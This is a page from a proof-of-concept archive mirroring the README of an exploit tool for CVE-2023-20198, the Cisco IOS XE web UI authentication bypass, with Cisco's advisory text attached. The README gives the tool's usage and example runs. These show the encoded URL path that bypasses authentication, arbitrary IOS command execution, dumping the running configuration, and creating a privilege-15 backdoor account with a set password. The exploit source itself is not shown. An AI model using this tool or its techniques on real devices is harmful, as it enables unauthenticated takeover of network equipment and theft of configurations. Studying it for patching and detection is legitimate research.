Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-20198 PoC — Cisco IOS XE Software 安全漏洞

Source
https://github.com/smokeintheshell/CVE-2023-20198
Associated Vulnerability
Title:Cisco IOS XE Software 安全漏洞 (CVE-2023-20198)
Description:Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.
Description
CVE-2023-20198 Exploit PoC
Readme
# CVE-2023-20198
Exploit PoC for CVE-2023-20198

## Description
CVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>
By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> 

This PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>
The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>

Abuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>
Abuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.

## Usage
```
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity
```

### Vulnerability check
To check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```

### Get Cisco Config
The `-g` option executes `sh run` to pull the running config<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...
```

### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Extreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...
```

### Add user
The `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.
```

### Del user
The `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>
Caution should be used to make sure you aren't deleting a legitimate account.<br>
This was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>

## References
[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>
[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>
[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>
[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>

## TODO
- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling

## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil
File Snapshot

 [4.0K]  /data/pocs/5840514e714742bf0bf4d7119cae448e3c9f6f86
├── [ 17K]  exploit.py
└── [5.7K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →